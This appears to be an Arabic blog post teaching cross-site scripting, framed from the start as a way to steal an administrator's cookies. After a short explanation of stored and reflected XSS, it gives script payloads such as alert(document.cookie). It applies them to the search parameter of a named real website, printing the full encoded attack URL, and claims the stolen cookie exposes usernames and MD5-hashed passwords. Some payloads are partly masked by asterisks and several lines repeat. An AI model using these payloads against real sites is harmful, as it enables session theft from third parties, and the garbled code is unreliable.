إظهار الرسائل ذات التسميات ثغرات. إظهار كافة الرسائل
تعريفها
و هى ثغرة من خلالها يمكنك سحب الكوكيز الخاص بالادمن
ثغرة [ XSS ] هي اختصار لـ[ Cross site scripting ] وسبب عدم كتابتها بالاختصار الصحيح [ CSS ] لكي لا يحدث خلط مع لغة الـ[ CSS ] الانماط القياسية المعروفة [ Cascading Style Sheets ] , وبذلك تم تسميتها [ XSS ]
ثغرات [ XSS ] لها نوعين وهما
1 ثغرات XSS ثابته - مخزّنه [ Persistent - stored ]
2 ثغرات XSS غير ثابته - غير مخزّنه [ Non persistent - Reflecte ثغرات XSS الثابته هي اخطر من النوع الغير ثابت , وذلك لان ثغرات XSS الثابته , مايدخله الزائر ثابت بالصفحه , اي مايدخله مثلاً يخزّن بقاعدة بيانات السكربت
ثغرات الغير ثابته , هي النوع الاكثر انتشاراً وليس خطورة وهي التي تقوم على اساس الادخال الخاص مثلاً , كما ذكرنا سابقاً عند البحث في المنتديات هنا الحالة تسمى غير ثابته
الكود المهم في ثغرات xss
كود:
**********alert(**************)</script>**********alert("XSS")</script>
هذا كود سكربت خبيث يأتي بمعلومات الكوكيز تجده دائما ً في ثغرات
هذا السكربت و ظيفته هي سرقة الكوكيز و هذا الكوكيز
يحتوي على اليوزر نايم و الباسوورد المشفرmd5
مثلا ناخذ هذا الموقع
هذا السكربت و ظيفته هي سرقة الكوكيز و هذا الكوكيز
يحتوي على اليوزر نايم و الباسوورد المشفرmd5
مثلا ناخذ هذا الموقع
كود HTML:
https://www.calacademy.org
وريح يكون استغلال مثلا بشكل هذا
كود HTML:
https://www.calacademy.org/search.php?q=
الكود هذا نحطو في اخير بعد العلامة (=)
نحط هذا الكود وانت يمكن تغير ما بينا قوسين الملف المصاب
نحط هذا الكود وانت يمكن تغير ما بينا قوسين الملف المصاب
كود:
**********alert(document.cookie)</script>**********alert("XSS")</script>
المهم يصبح هيك
كود HTML:
https://www.calacademy.org/search.php?q=%3Cscript%3Ealert%28document.cookie%2 9%3C/script%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E
هناك العديد من الطرق , وجميعها تعتبر من الطرق البرمجية ( اي حقن
اكواد برمجية ) , لذلك كل ما زادت خلفية المخترق في البرمجة كل ما تمكن من
التعامل مع هذه الثغرات باحترافية اكثر .
1
1
تابع القراءه »
الاشتراك في:
الرسائل (Atom)
.jpg)
